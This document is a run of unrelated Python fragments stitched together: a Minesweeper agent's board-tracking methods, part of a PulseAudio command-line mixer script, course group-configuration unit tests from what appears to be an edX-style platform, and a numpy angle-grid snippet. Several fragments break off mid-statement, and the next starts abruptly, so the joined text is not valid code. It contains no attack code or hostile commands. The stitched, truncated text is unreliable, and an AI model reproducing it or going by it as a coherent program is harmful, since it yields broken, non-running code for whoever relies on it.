def logLastMovePercept(self, number):
""" log the feedback percept number from the world """
if self.lastAction == AI.Action(1):
self.lastTile.covered = False
self.lastTile.number = number
def logMove(self, action, c, r):
""" log the last move """
self.cLast = c
self.rLast = r
self.lastTile = self.board[c][r]
self.lastAction = action
self.movesMade+=1
self.unknown.remove((c, r))
if (c, r) in list(self.prob.keys()):
self.prob.pop((c, r))
def __updateFirstMove(self) -> None:
""" update the first move in KB"""
c = self.startX
r = self.startY
self.unknown.remove((c, r))
# self.safeQ.append([c, r])
self.cLast = c
self.rLast = r
# update the 4 instances for these coordinates if necessary
self.board[c][r].covered = False
self.board[c][r].number = 0
# update lastTile instance
self.lastTile = self.board[c][r]
self.lastAction = AI.Action(1)
###########################################################################
# print current board #
###########################################################################
def __createBoard(self) -> None:
""" create a board with given dimension and set moves limit"""
self.board = [[self.__Tile() for i in range(self.row)] for j in range(self.col)]
self.movesLimit = self.col * self.row * 2 - 1
def __printWorld(self) -> None:
""" Prints to console information about Minesweeper World """
self.KB()
self.__printAgentInfo()
def KB(self) -> None:
""" Print board for debugging """
print("================================================================")
print("================================================================")
print("================== Agent's current knowledge base ==============")
print("Number of mines: " + str(self.minesLeft))
print("Number of flags left: " + str(self.flagsLeft))
board_as_string = ""
print("", end=" ")
for r in range(self.row - 1, -1, -1):
print(str(r).ljust(2) + '|', end=" ")
for c in range(self.col):
self.__printTileInfo(c, r)
if (r != 0):
print('\n', end=" ")
column_label = " "
column_border = " "
for c in range(0, self.col):
column_border += "---"
column_label += str(c).ljust(3)
print(board_as_string)
print(column_border)
print(column_label)
print("================================================================")
print("================================================================")
print("================================================================")
def __printAgentInfo(self) -> None:
""" Prints information about the board that are useful to the user """
print("Tiles covered: " + \
str(self.coveredTiles) + \
" | Flags left: " + \
str(self.flagsLeft) + \
" | Last action: {} on {}"\
.format(self.lastAction, self.lastTile))
def __printTileInfo(self, c: int, r: int) -> None:
""" Checks tile attributes and prints accordingly """
if not self.board[c][r].covered and self.board[c][r].mine:
print('B ', end=" ")
elif not self.board[c][r].covered:
print(str(self.board[c][r].number) + ' ', end=" ")
elif self.board[c][r].flag:
print('? ', end=" ")
elif self.board[c][r].covered:
print('. ', end=" ")
###########################################################################
# Tile information #
###########################################################################
def __isInBounds(self, c: int, r: int) -> bool:
""" Returns true if given coordinates are within the boundaries """
if c < self.col and c >= 0 and \
r < self.row and r >= 0:
return True
return False
def frontier(self):
""" Return a list of tiles to be explored / for gaussian elimination """
frontier = []
for _ in self.unknown:
col = _[0]
row = _[1]
coord = (col, row)
if ( len(self.surTiles(coord)) - self.surCovered(col, row)[0] > 0 ):
frontier.append(_)
return frontier
def constraints(self):
""" Return a list of tiles next to the frontier as constraints """
constraints = []
for col in range(self.col):
for row in range(self.row):
if self.board[col][row].number > 0 and \
self.surUnknown(col, row)[0] > 0:
constraints.append((col, row))
return constraints
def surTiles(self, coord):
""" return a list of surrounding tiles' coordinates"""
tiles = set()
for c in range(coord[0]-1, coord[0]+2):
for r in range(coord[1]-1, coord[1]+2):
if self.__isInBounds(c, r) and (c, r) != coord:
tiles.add((c, r))
return tiles
def surUnknown(self, col, row):
""" return the total number of tiles that are unknown """
count = 0
noFlag = []
for c in range(col-1, col+2):
for r in range(row-1, row+2):
if self.__isInBounds(c, r) and (c, r) != (col, row):
if self.known((c,r)) == False:
count+=1
noFlag.append((c, r))
return count, noFlag
def surCovered(self, col, row):
""" return the total number of covered tiles, and a list of coordinates
of those covered tiles surrounding the input coords """
count = 0
covered = []
for c in range(col-1, col+2):
for r in range(row-1, row+2):
if self.__isInBounds(c, r) and (c, r) != (col, row):
if self.board[c][r].covered == True:
count+=1
covered.append((c, r))
return count, covered
def surMines(self, col, row):
""" return the number of mines, and a list of coordinates of those
mines surrounding the input coords """
count = 0
s_mines = []
for c in range(col-1, col+2):
for r in range(row-1, row+2):
if self.__isInBounds(c, r):
if self.board[c][r].mine == True:
self.board[c][r].flag = True
count+=1
s_mines.append((c, r))
return count, s_mines
def set_known(self, tiles):
""" return True only if every tile in the given collection is known """
for i in tiles:
if self.known(i) == False:
return False
return True
def known(self, coord):
""" test if the tile is unknown (covered and not flagged) """
if self.board[coord[0]][coord[1]].covered == True and \
self.board[coord[0]][coord[1]].flag == False:
return False
return True
###########################################################################
# Multisquare method #
###########################################################################
def neighbor_test(self, col, row):
""" return the number of wild tiles, and a list of safe tiles if any """
safe = []
center = (col, row)
percept_center = self.board[col][row].number
# neighbors = self.surTiles((col, row))
neighbors_list = []
for co in range(col-2, col+3):
for ro in range(row-2, row+3):
if self.__isInBounds(co, ro) == True and \
(co, ro) != (col, row):
neighbors_list.append((co, ro))
neighbors
<reponame>mk-fg/pulseaudio-mixer-cli
#!/usr/bin/env python3
import itertools as it, operator as op, functools as ft
from collections import OrderedDict, defaultdict, deque, namedtuple
from contextlib import contextmanager
import os, sys, io, re, time, logging, configparser
import base64, hashlib, unicodedata, math
import signal, threading
from pulsectl import ( Pulse,
PulseEventTypeEnum as ev_t, PulseEventFacilityEnum as ev_fac, PulseEventMaskEnum as ev_m,
PulseLoopStop, PulseDisconnected, PulseIndexError )
class LogMessage:
def __init__(self, fmt, a, k): self.fmt, self.a, self.k = fmt, a, k
def __str__(self): return self.fmt.format(*self.a, **self.k) if self.a or self.k else self.fmt
class LogStyleAdapter(logging.LoggerAdapter):
def __init__(self, logger, extra=None):
super(LogStyleAdapter, self).__init__(logger, extra or {})
def log(self, level, msg, *args, **kws):
if not self.isEnabledFor(level): return
log_kws = {} if 'exc_info' not in kws else dict(exc_info=kws.pop('exc_info'))
msg, kws = self.process(msg, kws)
self.logger._log(level, LogMessage(msg, args, kws), (), log_kws)
get_logger = lambda name: LogStyleAdapter(logging.getLogger(name))
def uid_str( seed=None, length=4,
_seed_gen=it.chain.from_iterable(map(range, it.repeat(2**30))) ):
seed_bytes = length * 6 // 8
assert seed_bytes * 8 // 6 == length, [length, seed_bytes]
if seed is None: seed = '\0\0\0{:08x}'.format(next(_seed_gen))
seed = hashlib.sha256(bytes(seed, encoding='utf-8')).digest()[:seed_bytes]
return base64.urlsafe_b64encode(seed).decode()
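# e.g. uid_str() returns a 4-character urlsafe-base64 id (length=4 maps to 3 hash
# bytes, i.e. 4 base64 chars); the same seed string always yields the same id.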
class Conf:
def __repr__(self): return repr(vars(self))
adjust_step = 5.0 # percent, 0-100
# Volume values are relative to "normal" (non-soft-boosted) pulseaudio volume
max_volume = 1.0 # relative value, displayed as "100%"
min_volume = 0.01 # relative value, displayed as "0%"
volume_type = 'flat' # 'flat', 'log' (base=e) or 'log-N' where N is logarithm base (int/float)
volume_after_max = False # whether volume is allowed to be raised beyond max value manually
use_device_name = False
use_media_name = False
placeholder_media_names = [ # avoid displaying these, as they're not informative
'audio stream', 'AudioStream', 'Output', 'Playback',
'Playback Stream', 'ALSA Playback', 'Simple DirectMedia Layer' ]
name_len_max = 100
name_cut_from = 'left' # "left" or "right"
name_show_level = True
overkill_redraw = False # if terminal gets resized often, might cause noticeable flickering
overkill_updates = False # always refresh lists of sinks/streams from scratch
verbose = False
reconnect = True
show_stored_values = True
show_controls = True
stream_params = stream_params_reapply = None
char_name_replace_broken = '_'
char_bar_fill = '#'
char_bar_empty = '-'
char_bar_softvol = 'X'
focus_default = 'first' # either "first" or "last"
focus_new_items = True
focus_new_items_delay = 5.0 # min seconds since last focus change to trigger this
# Whether to wrap focus when going past first/last item
focus_wrap_first = False
focus_wrap_last = False
event_proc_delay = 0.0 # 0 - disable
force_refresh_interval = 0.0 # 0 or negative - disable
# These are set for volume_type and operate on normalized (mixer) 0-1.0 values
_vol_cap = staticmethod(lambda v: min(1.0, max(0, v)))
_vol_type_set = _vol_type_get = lambda s,v: s._vol_cap(v)
# Volume calculation funcs convert pulse -> mixer values (get) or vice-versa (set)
_vol_calc_get = lambda conf, vol_pulse: conf._vol_type_get(
(vol_pulse - conf.min_volume) / (conf.max_volume - conf.min_volume) )
_vol_calc_set = ( lambda conf, vol:
conf._vol_type_set(vol) * (conf.max_volume - conf.min_volume) + conf.min_volume )
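# Illustrative mapping with the flat scale and the defaults above
# (min_volume=0.01, max_volume=1.0): a pulse volume of 0.505 maps to a mixer
# value of (0.505 - 0.01) / 0.99 = 0.5, and _vol_calc_set(0.5) maps back to 0.505.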
@staticmethod
def parse_bool(val, _states={
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False }):
try: return _states[val.lower()]
except KeyError: raise ValueError(val)
def conf_read(path=None, base=None, **overrides):
conf, conf_file = base or Conf(),\
os.path.expanduser(path or conf_read.path_default)
try: conf_file = open(conf_file)
except (OSError, IOError) as err: pass
else: conf_update_from_file(conf, conf_file, overrides)
return conf
conf_read.path_default = '~/.pulseaudio-mixer-cli.cfg'
def conf_update_from_file(conf, path_or_file, overrides):
if isinstance(path_or_file, str): path_or_file = open(path_or_file)
with path_or_file as src:
config = configparser.RawConfigParser(
allow_no_value=True, inline_comment_prefixes=(';',) )
try: config.read_file(src)
except configparser.MissingSectionHeaderError:
src.seek(0)
src = src.read()
src = io.StringIO('[default]' + ('\r\n' if '\r\n' in src else '\n') + src)
config.read_file(src)
for k in dir(conf):
if k.startswith('_'): continue
v = getattr(conf, k)
if k in overrides:
setattr(conf, k, overrides[k])
continue
if isinstance(v, str): get_val = lambda *a: str(config.get(*a))
elif isinstance(v, bool): get_val = config.getboolean
elif isinstance(v, int): get_val = config.getint
elif isinstance(v, float): get_val = lambda *a: float(config.get(*a))
else: continue # values with other types cannot be specified in config
for k_conf in k, k.replace('_', '-'):
try: setattr(conf, k, get_val('default', k_conf))
except configparser.Error: pass
if conf.volume_after_max:
conf._vol_cap = lambda v: max(0, v)
if conf.volume_type != 'flat':
if conf.volume_type == 'log': vol_log_base = math.e
elif conf.volume_type.startswith('log-'):
vol_log_base = max(1.0000001, float(conf.volume_type.split('-', 1)[-1]))
else: raise ValueError(f'Unrecognized volume_type value: {conf.volume_type!r}')
conf._vol_type_get = lambda v,b=vol_log_base: conf._vol_cap(math.log(v * (b - 1) + 1, b))
conf._vol_type_set = lambda v,b=vol_log_base: (b ** conf._vol_cap(v) - 1) / (b - 1)
conf.stream_params = OrderedDict(conf.stream_params or dict())
conf.stream_params_reapply = list() # ones to re-apply on every event
for sec in config.sections():
if not re.search(r'^stream\b.', sec): continue
params = list()
for k, v in config.items(sec):
match = re.search(r'^(match|equals)\[(.*)\]$', k)
if match:
v = re.compile(r'^{}$'.format(re.escape(v)) if match.group(1) == 'equals' else v)
params.append(('match', match.group(2), v))
else: params.append(('set', k, v))
if k == 'reapply' and conf.parse_bool(v):
conf.stream_params_reapply.append(sec)
conf.stream_params[sec] = params
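# Illustrative config section parsed by the loop above (section and property
# names are examples only):
#   [stream-my-player]
#   equals[application.name] = MyPlayer
#   reapply = yes
# 'equals[...]' keys are compiled into exact-match regexps, 'match[...]' keys are
# used as regexps directly, and any other key is stored as a 'set' parameter.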
class PAMixerMenuItem:
name, volume, muted = '', 0, False
menu = uid = text = None
def muted_toggle(self): self.muted = not self.muted
def volume_change(self, delta):
log.debug('Volume update: {} -> {} [{}]', self.volume, self.volume + delta, delta)
self.volume += delta
def special_action(self, key, key_match): pass
def get_next(self, m=1):
return self.menu.item_after(self, m=m) if self.menu else self
def get_prev(self, m=1):
return self.menu.item_before(self, m=m) if self.menu else self
class PAMixerMenu:
focus_policies = dict(first=op.itemgetter(0), last=op.itemgetter(-1))
items, controls, conf = tuple(), OrderedDict(), Conf()
def update(self, incremental=False): return
@property
def item_list(self): return list(self.items) # for display only
def item_default(self, n=None):
items = self.item_list
if not items: return
idx = None
if n is not None: idx = max(0, min(n, len(items)-1))
return items[idx] if idx is not None\
else self.focus_policies[self.conf.focus_default](items)
def item_newer(self, ts): return
def item_id(self, item): return item.uid
def item_shift(self, item=None, m=0, t=None):
if t and self.items:
n = dict(first=0, last=len(self.items)-1).get(t)
assert n is not None, t
return self.items[n]
if item:
for n, item2 in enumerate(self.items):
if self.item_id(item2) == self.item_id(item):
n_max, n = len(self.items) - 1, n + m
if m > 0 and n > n_max: n = 0 if self.conf.focus_wrap_last else n_max
elif m < 0 and n < 0: n = n_max if self.conf.focus_wrap_first else 0
return self.items[n]
return self.item_default()
def item_after(self, item=None, m=1):
return self.item_shift(item=item, m=m)
def item_before(self, item=None, m=1):
return self.item_shift(item=item, m=-m)
class PAMixerReconnect(Exception): pass
class PAMixerEvent:
__slots__ = 'obj_type obj_index t'.split()
pulsectl_facility_map = dict(sink='sink', sink_input='stream')
@classmethod
def from_pulsectl_ev(cls, ev):
obj_type = cls.pulsectl_facility_map.get(ev.facility)
if not obj_type: return
return cls(obj_type, ev.index, ev.t)
def __init__(self, obj_type, obj_index, t=None):
self.obj_type, self.obj_index, self.t = obj_type, obj_index, t
def __str__(self): return repr(dict((k, getattr(self, k)) for k in self.__slots__))
class PAMixerStreamsItem(PAMixerMenuItem):
name = '???'
def __init__(self, streams, obj_t, obj_id, obj):
self.menu, self.conf = streams, streams.conf
self.t, self.uid = obj_t, obj_id
self.hidden = self.name_custom = False
self.created_ts = time.monotonic()
self.update(obj)
if self.conf.dump_stream_params:
from pprint import pprint
dump = OrderedDict(uid=self.uid, name=self.name)
dump['props'] = sorted(self.obj.proplist.items())
pprint(dump, sys.stderr)
sys.stderr.flush()
def __repr__(self):
return '<{}[{:x}] {}[{}]: {}>'.format(
self.__class__.__name__, id(self), self.t, self.uid, self.name )
def update(self, obj=None):
if obj: self.obj = obj
if not self.name_custom: self.name_update()
def name_update(self, name=None):
if not name: name = self._get_name() or 'knob'
else: self.name_custom = True
self.name_base = self.name = name
def _get_name(self):
try: return self._get_name_descriptive()
except Exception as err:
if self.menu.fatal: raise
log.info('Failed to get descriptive name for {!r} ({}): {}', self.t, self.uid, err)
return self.t
def _get_name_descriptive(self):
'Can probably fail with KeyError if something is really wrong with stream/device props.'
ext, props = None, dict(
(k, self._strip_noise_bytes(v, self.conf.char_name_replace_broken))
for k, v in self.obj.proplist.items() )
if self.t == 'stream':
if self.conf.use_media_name:
name = props.get('media.name')
if name and name not in self.conf.placeholder_media_names: return name
try: name = props['application.name']
except KeyError: name = props['media.name'] # some synthetic stream with non-descriptive name
ext = '({application.process.user}@'\
'{application.process.host}:{application.process.id})'
elif self.t == 'sink':
if self.conf.use_device_name: name = self.obj.name
else:
name = props.get('alsa.id')\
or props.get('device.description') or props.get('device.api')
if not name:
try: name = '{}.{}'.format(props['device.api'], props['device.string'])
except KeyError: name = props['device.description']
ext = '({device.profile.name}@{alsa.driver_name})'
else: raise KeyError('Unknown streams-item type (for naming): {}'.format(self.t))
if ext:
try:
name = '{} {}'.format( name,
re.sub(r'\{([^}]+)\}', r'{}', ext).format(
*op.itemgetter(*re.findall(r'\{([^}]+)\}', ext))(props) ) )
except KeyError as err:
log.debug( 'Unable to get extended descriptive name'
' (type: {!r}, uid: {}) due to missing key: {}', self.t, self.uid, err )
return name
def _strip_noise_bytes(self, obj, replace='_'):
'''Make sure there aren't any random weird chars that don't belong to any alphabet.
Only ASCII non-letters are allowed, as fancy symbols don't seem to work well with curses.'''
if not isinstance(obj, str): obj = str(obj)
obj_ucs = list()
for uc in obj:
try:
unicodedata.name(uc)
if unicodedata.category(uc) != 'Ll': uc.encode('ascii')
except (ValueError, UnicodeEncodeError):
if replace: obj_ucs.append(replace)
else: obj_ucs.append(uc)
return ''.join(obj_ucs)
@property
def muted(self):
return bool(self.obj.mute)
@muted.setter
def muted(self, val):
self.obj.mute = int(val)
with self.menu.update_wakeup() as pulse: pulse.mute(self.obj, self.obj.mute)
@property
def volume(self):
'Volume as one float in 0-1 range.'
return self.conf._vol_calc_get(self.obj.volume.value_flat)
@volume.setter
def volume(self, val):
val_pulse = self.conf._vol_calc_set(val)
log.debug('Setting volume: {} (pulse: {}) for {}', val, val_pulse, self)
# log.debug(
# 'Volume: [mixer: {:.4f} -> {:.4f}] [pulse: {:.4f} -> {:.4f}]',
# self.volume, val, self.obj.volume.value_flat, val_pulse )
with self.menu.update_wakeup() as pulse: pulse.volume_set_all_chans(self.obj, val_pulse)
def special_action(self, ui, key):
if ui.key_match(key, 'i'):
with self.menu.update_wakeup() as pulse:
ui.info = PAMixerStreamInfo(self.obj.proplist)
ui.mode_switch('info')
@property
def port(self):
if self.t != 'sink': return
return self.obj.port_active
@port.setter
def port(self, name):
if self.t != 'sink':
log.warning( 'Setting ports is only'
' available for {!r}-type streams, not {!r}-type', 'sink', self.t )
with self.menu.update_wakeup() as pulse: pulse.port_set(self.obj, name)
class PAMixerStreams(PAMixerMenu):
controls = dict(i='show item info')
def __init__(self, pulse, conf=None, fatal=False):
self.pulse, self.fatal, self.conf = pulse, fatal, conf or Conf()
self.items, self.item_objs = list(), OrderedDict()
self.connected, self._updates = None, deque()
self._pulse_hold, self._pulse_lock = threading.Lock(), threading.Lock()
def update(self, incremental=False):
while True:
try: ev = self._updates.popleft()
except: ev = None
# Restarts whole thing with new pulse connection
if self.connected is False: raise PAMixerReconnect()
# Add/remove/update items
if not self.conf.overkill_updates and incremental and not ev: break
obj_new, obj_gone = set(), set()
obj_id_func = lambda t,index: '{}-{}'.format(t, index)
if not ev: obj_gone.update(self.item_objs) # i.e. replace whole list
with self.update_wakeup(trap_errors=False) as pulse:
for obj_t, obj_list_func, obj_info_func in\
[ ('sink', pulse.sink_list, pulse.sink_info),
('stream', pulse.sink_input_list, pulse.sink_input_info) ]:
obj_list_full = obj_list = None # "replace all" vs "new/update X"
if
the course contains the new group configuration.
user_partitions = self.course.user_partitions
self.assertEqual(len(user_partitions), 1)
self.assertEqual(user_partitions[0].name, '<NAME>')
self.assertEqual(len(user_partitions[0].groups), 2)
self.assertEqual(user_partitions[0].groups[0].name, 'Group A')
self.assertEqual(user_partitions[0].groups[1].name, 'Group B')
self.assertEqual(user_partitions[0].parameters, {})
def test_can_edit_group_configuration(self):
"""
Edit group configuration and check its id and modified fields.
"""
self._add_user_partitions()
self.save_course()
expected = {
'id': self.ID,
'name': '<NAME>',
'scheme': 'random',
'description': 'New Test description',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'New Group Name', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [],
'parameters': {},
'active': True,
}
response = self.client.put(
self._url(),
data=json.dumps(expected),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, expected)
self.reload_course()
# Verify that user_partitions is properly updated in the course.
user_partitions = self.course.user_partitions
self.assertEqual(len(user_partitions), 1)
self.assertEqual(user_partitions[0].name, 'New Test name')
self.assertEqual(len(user_partitions[0].groups), 2)
self.assertEqual(user_partitions[0].groups[0].name, 'New Group Name')
self.assertEqual(user_partitions[0].groups[1].name, 'Group C')
self.assertEqual(user_partitions[0].parameters, {})
def test_can_delete_group_configuration(self):
"""
Delete group configuration and check user partitions.
"""
self._add_user_partitions(count=2)
self.save_course()
response = self.client.delete(
self._url(cid=0),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 204)
self.reload_course()
# Verify that user_partitions is properly updated in the course.
user_partitions = self.course.user_partitions
self.assertEqual(len(user_partitions), 1)
self.assertEqual(user_partitions[0].name, 'Name 1')
def test_cannot_delete_used_group_configuration(self):
"""
Cannot delete group configuration if it is in use.
"""
self._add_user_partitions(count=2)
self._create_content_experiment(cid=0)
response = self.client.delete(
self._url(cid=0),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 400)
content = json.loads(response.content.decode('utf-8'))
self.assertTrue(content['error'])
self.reload_course()
# Verify that user_partitions is still the same.
user_partitions = self.course.user_partitions
self.assertEqual(len(user_partitions), 2)
self.assertEqual(user_partitions[0].name, 'Name 0')
def test_cannot_delete_non_existent_group_configuration(self):
"""
Cannot delete a group configuration if it doesn't exist.
"""
self._add_user_partitions(count=2)
response = self.client.delete(
self._url(cid=999),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 404)
# Verify that user_partitions is still the same.
user_partitions = self.course.user_partitions
self.assertEqual(len(user_partitions), 2)
self.assertEqual(user_partitions[0].name, 'Name 0')
@ddt.data(CONTENT_TYPE_GATING_SCHEME, ENROLLMENT_SCHEME)
def test_cannot_create_restricted_group_configuration(self, scheme_id):
"""
Test that you cannot create a restricted group configuration.
"""
group_config = dict(GROUP_CONFIGURATION_JSON)
group_config['scheme'] = scheme_id
group_config.setdefault('parameters', {})['course_id'] = str(self.course.id)
response = self.client.ajax_post(
self._url(),
data=group_config
)
self.assertEqual(response.status_code, 400)
@ddt.data(
(CONTENT_TYPE_GATING_SCHEME, CONTENT_GATING_PARTITION_ID),
(ENROLLMENT_SCHEME, ENROLLMENT_TRACK_PARTITION_ID),
)
@ddt.unpack
def test_cannot_edit_restricted_group_configuration(self, scheme_id, partition_id):
"""
Test that you cannot edit a restricted group configuration.
"""
group_config = dict(GROUP_CONFIGURATION_JSON)
group_config['scheme'] = scheme_id
group_config.setdefault('parameters', {})['course_id'] = str(self.course.id)
response = self.client.put(
self._url(cid=partition_id),
data=json.dumps(group_config),
content_type="application/json",
HTTP_ACCEPT="application/json",
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(response.status_code, 400)
@ddt.ddt
class GroupConfigurationsUsageInfoTestCase(CourseTestCase, HelperMethods):
"""
Tests for usage information of configurations and content groups.
"""
def _get_user_partition(self, scheme):
"""
Returns the first user partition with the specified scheme.
"""
for group in GroupConfiguration.get_all_user_partition_details(self.store, self.course):
if group['scheme'] == scheme:
return group
return None
def _get_expected_content_group(self, usage_for_group):
"""
Returns the expected configuration with particular usage.
"""
return {
'id': 0,
'name': 'Name 0',
'scheme': 'cohort',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1, 'usage': []},
{'id': 1, 'name': 'Group B', 'version': 1, 'usage': usage_for_group},
{'id': 2, 'name': 'Group C', 'version': 1, 'usage': []},
],
'parameters': {},
'active': True,
}
def test_content_group_not_used(self):
"""
Test that the right data structure will be created if the content group is not used.
"""
self._add_user_partitions(scheme_id='cohort')
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(usage_for_group=[])
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_when_special_characters_are_in_content(self):
"""
Test that the content group JSON is updated successfully with usage information when special characters are present in the content.
"""
self._add_user_partitions(count=1, scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(
cid=0, group_id=1, name_suffix='0', special_characters="JOSÉ ANDRÉS"
)
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(
usage_for_group=[
{
'url': f"/container/{vertical.location}",
'label': "Test Unit 0 / Test Problem 0JOSÉ ANDRÉS"
}
]
)
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_for_content_groups(self):
"""
Test that the content group JSON is updated successfully with usage information.
"""
self._add_user_partitions(count=1, scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='0')
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(usage_for_group=[
{
'url': f'/container/{vertical.location}',
'label': 'Test Unit 0 / Test Problem 0'
}
])
self.assertEqual(actual, expected)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_can_get_correct_usage_info_with_orphan(self, module_store_type):
"""
Test that the content group JSON is updated successfully with usage information
even if there is an orphan in the content group.
"""
self.course = CourseFactory.create(default_store=module_store_type)
self._add_user_partitions(count=1, scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='0', orphan=True)
# Assert that there is an orphan in the course, and that it's the vertical
self.assertEqual(len(self.store.get_orphans(self.course.id)), 1)
self.assertIn(vertical.location, self.store.get_orphans(self.course.id))
# Get the expected content group information based on module store.
if module_store_type == ModuleStoreEnum.Type.mongo:
expected = self._get_expected_content_group(usage_for_group=[
{
'url': f'/container/{vertical.location}',
'label': 'Test Unit 0 / Test Problem 0'
}
])
else:
expected = self._get_expected_content_group(usage_for_group=[])
# Get the actual content group information
actual = self._get_user_partition('cohort')
# Assert that actual content group information is same as expected one.
self.assertEqual(actual, expected)
def test_can_use_one_content_group_in_multiple_problems(self):
"""
Test that multiple problems are present in the usage info when they use the same
content group.
"""
self._add_user_partitions(scheme_id='cohort')
vertical, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='0')
vertical1, __ = self._create_problem_with_content_group(cid=0, group_id=1, name_suffix='1')
actual = self._get_user_partition('cohort')
expected = self._get_expected_content_group(usage_for_group=[
{
'url': f'/container/{vertical1.location}',
'label': 'Test Unit 1 / Test Problem 1'
},
{
'url': f'/container/{vertical.location}',
'label': 'Test Unit 0 / Test Problem 0'
}
])
self.assertEqual(actual, expected)
def test_group_configuration_not_used(self):
"""
Test that the right data structure will be created if the group configuration is not used.
"""
self._add_user_partitions()
actual = GroupConfiguration.get_split_test_partitions_with_usage(self.store, self.course)
expected = [{
'id': 0,
'name': 'Name 0',
'scheme': 'random',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': 1, 'name': 'Group B', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [],
'parameters': {},
'active': True,
}]
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_for_split_test(self):
"""
When a split test is created and content group access is set for a problem within a group,
the usage info should return a url to the split test, not to the group.
"""
# Create user partition for groups in the split test,
# and another partition to set group access for the problem within the split test.
self._add_user_partitions(count=1)
self.course.user_partitions += [
UserPartition(
id=1,
name='Cohort User Partition',
scheme=UserPartition.get_scheme('cohort'),
description='Cohort User Partition',
groups=[
Group(id=3, name="Problem Group")
],
),
]
self.store.update_item(self.course, ModuleStoreEnum.UserID.test)
__, split_test, problem = self._create_content_experiment(cid=0, name_suffix='0', group_id=3, cid_for_problem=1) # lint-amnesty, pylint: disable=unused-variable
expected = {
'id': 1,
'name': 'Cohort User Partition',
'scheme': 'cohort',
'description': 'Cohort User Partition',
'version': UserPartition.VERSION,
'groups': [
{'id': 3, 'name': 'Problem Group', 'version': 1, 'usage': [
{
'url': f'/container/{split_test.location}',
'label': 'Condition 1 vertical / Test Problem'
}
]},
],
'parameters': {},
'active': True,
}
actual = self._get_user_partition('cohort')
self.assertEqual(actual, expected)
def test_can_get_correct_usage_info_for_unit(self):
"""
When group access is set on the unit level, the usage info should return a url to the unit, not
the sequential parent of the unit.
"""
self.course.user_partitions = [
UserPartition(
id=0,
name='User Partition',
scheme=UserPartition.get_scheme('cohort'),
description='User Partition',
groups=[
Group(id=0, name="Group")
],
),
]
vertical, __ = self._create_problem_with_content_group(
cid=0, group_id=0, name_suffix='0'
)
self.client.ajax_post(
reverse_usage_url("xblock_handler", vertical.location),
data={'metadata': {'group_access': {0: [0]}}}
)
actual = self._get_user_partition('cohort')
# order of usage list is arbitrary, sort for reliable comparison
actual['groups'][0]['usage'].sort(key=itemgetter('label'))
expected = {
'id': 0,
'name': 'User Partition',
'scheme': 'cohort',
'description': 'User Partition',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group', 'version': 1, 'usage': [
{
'url': f"/container/{vertical.location}",
'label': "Test Subsection 0 / Test Unit 0"
},
{
'url': f"/container/{vertical.location}",
'label': "Test Unit 0 / Test Problem 0"
}
]},
],
'parameters': {},
'active': True,
}
self.maxDiff = None
assert actual == expected
def test_can_get_correct_usage_info(self):
"""
Test that the group configurations JSON is updated successfully with usage information.
"""
self._add_user_partitions(count=2)
__, split_test, __ = self._create_content_experiment(cid=0, name_suffix='0')
self._create_content_experiment(name_suffix='1')
actual = GroupConfiguration.get_split_test_partitions_with_usage(self.store, self.course)
expected = [{
'id': 0,
'name': 'Name 0',
'scheme': 'random',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': 1, 'name': 'Group B', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [{
'url': f'/container/{split_test.location}',
'label': 'Test Unit 0 / Test Content Experiment 0',
'validation': None,
}],
'parameters': {},
'active': True,
}, {
'id': 1,
'name': 'Name 1',
'scheme': 'random',
'description': 'Description 1',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': 1, 'name': 'Group B', 'version': 1},
{'id': 2, 'name': 'Group C', 'version': 1},
],
'usage': [],
'parameters': {},
'active': True,
}]
self.assertEqual(actual, expected)
def test_can_get_usage_info_when_special_characters_are_used(self):
"""
Test that the group configurations JSON is updated successfully when special
characters are used in the content experiment.
"""
self._add_user_partitions(count=1)
__, split_test, __ = self._create_content_experiment(cid=0, name_suffix='0', special_characters="<NAME>")
actual = GroupConfiguration.get_split_test_partitions_with_usage(self.store, self.course)
expected = [{
'id': 0,
'name': 'Name 0',
'scheme': 'random',
'description': 'Description 0',
'version': UserPartition.VERSION,
'groups': [
{'id': 0, 'name': 'Group A', 'version': 1},
{'id': | |
values
self._phi = np.arctan2(self._yc, self._xc)
self._phi[self._phi < 0] += 2. * np.pi
# in some cases, it is more convenient to work with xc[z,y,x] so lets store views
self._theta_view = self._theta.view()
self._theta_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
self._phi_view = self._phi.view()
self._phi_view.shape = (self.moms_ngridpoints, self.moms_ngridpoints, self.moms_ngridpoints)
